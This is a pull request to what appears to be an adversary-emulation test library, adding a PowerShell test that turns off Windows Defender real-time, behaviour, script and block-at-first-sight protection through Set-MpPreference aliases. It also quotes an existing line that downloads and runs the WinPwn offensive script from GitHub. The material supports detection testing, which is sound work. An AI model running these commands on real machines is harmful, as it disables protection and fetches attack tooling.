### PR TITLE
Update T1562.001.yaml

### DIFF
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -644,3 +644,23 @@ atomic_tests:
       iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
       inv-phantom -consoleoutput -noninteractive  
     name: powershell
+- name: Tamper with Windows Defender ATP using Aliases - PowerShell
+  auto_generated_guid: 1b8ff4w0-50ec-4d53-bf83-899591c9b5d8
+  description: |
+    Attempting to disable scheduled scanning and other parts of Windows Defender ATP using set-MpPreference aliases. Upon execution Virus and Threat Protection will show as disabled
+    in Windows settings.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      Set-MpPreference -drtm $True
+      Set-MpPreference -dbm $True
+      Set-MpPreference -dscrptsc $True
+      Set-MpPreference -dbaf $True
+    cleanup_command: |
+      Set-MpPreference -drtm 0
+      Set-MpPreference -dbm 0
+      Set-MpPreference -dscrptsc 0
+      Set-MpPreference -dbaf 0
+    name: powershell
+    elevation_required: true

--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -645,7 +645,6 @@ atomic_tests:
       inv-phantom -consoleoutput -noninteractive  
     name: powershell
 - name: Tamper with Windows Defender ATP using Aliases - PowerShell
-  auto_generated_guid: 1b8ff4w0-50ec-4d53-bf83-899591c9b5d8
   description: |
     Attempting to disable scheduled scanning and other parts of Windows Defender ATP using set-MpPreference aliases. Upon execution Virus and Threat Protection will show as disabled
     in Windows settings.


### PR DESCRIPTION
Added Atomic Test to disable various Defender settings using an Alias for each. Reference https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps

![image](https://user-images.githubusercontent.com/5632822/179260586-e8dd5dba-8981-4e68-9b22-7cf6c1db06bf.png)

Confirmed operational on Win10
![image](https://user-images.githubusercontent.com/5632822/179260634-ba76433b-efd8-4526-851b-00179d8a919b.png)
